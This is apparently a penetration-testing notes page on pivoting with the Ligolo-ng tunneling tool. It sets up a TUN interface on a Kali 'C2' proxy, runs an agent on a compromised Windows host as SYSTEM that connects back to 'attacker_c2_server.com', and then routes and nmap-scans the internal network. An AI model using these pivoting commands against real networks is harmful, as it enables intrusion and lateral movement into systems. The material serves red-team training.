Ligolo-ng

An advanced, yet simple, tunneling tool that uses TUN interfaces.

https://github.com/nicocha30/ligolo-ng

Starting Ligolo

You should transfer an agent client to your target machine.

Setting up a NIC

When using Linux, you need to create a tun interface on the Proxy Server (C2):

#sudo ip tuntap add user [your_username] mode tun ligolo
#sudo ip link set ligolo up

Kali> sudo ip tuntap add user iptracej mode tun ligolo
Kali> sudo ip link set ligolo up
Kali> ifconfig

Starting a Proxy

# ./proxy -h # Help options 
Kali> proxy -selfcert

Staring an Agent

# $ ./agent -connect attacker_c2_server.com:11601 
CMD> .\agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert

Proxy Operation

# INFO[0102] Agent joined.  name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.100.2:49719"

Use 'session' command to select the agent. You can select a sessin number here. 

#ligolo-ng »  
#? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.100.2:49719

Use 'ipconfig' command to select the agent. 

#[Agent : NT AUTHORITY\SYSTEM@MS01] » 
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet0                      │
│ Hardware MAC │ 00:0c:29:3c:a0:bb              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.100.2/24               │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet1                      │
│ Hardware MAC │ 00:0c:29:3c:a0:c5              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 10.10.1.2/24                   │
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 2                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘

Add an route to your target network

Kali> sudo ip route add 10.10.1.0/24 dev ligolo
Kali> ip route

# Remove the route
# Kali> sudo ip route del 10.10.1.0/24 dev ligolo

Start tunnel 

#[Agent : NT AUTHORITY\SYSTEM@MS01] » 
#[Agent : NT AUTHORITY\SYSTEM@MS01] » INFO[1113] Starting tunnel to NT AUTHORITY\SYSTEM@MS01

Kali Commands

ping -c 2 <internal machine>
nmap -sC -sv <internal machine> 
...
PreviousPivoting / NetworkNextLocal ports(127.0.0.1)

Last updated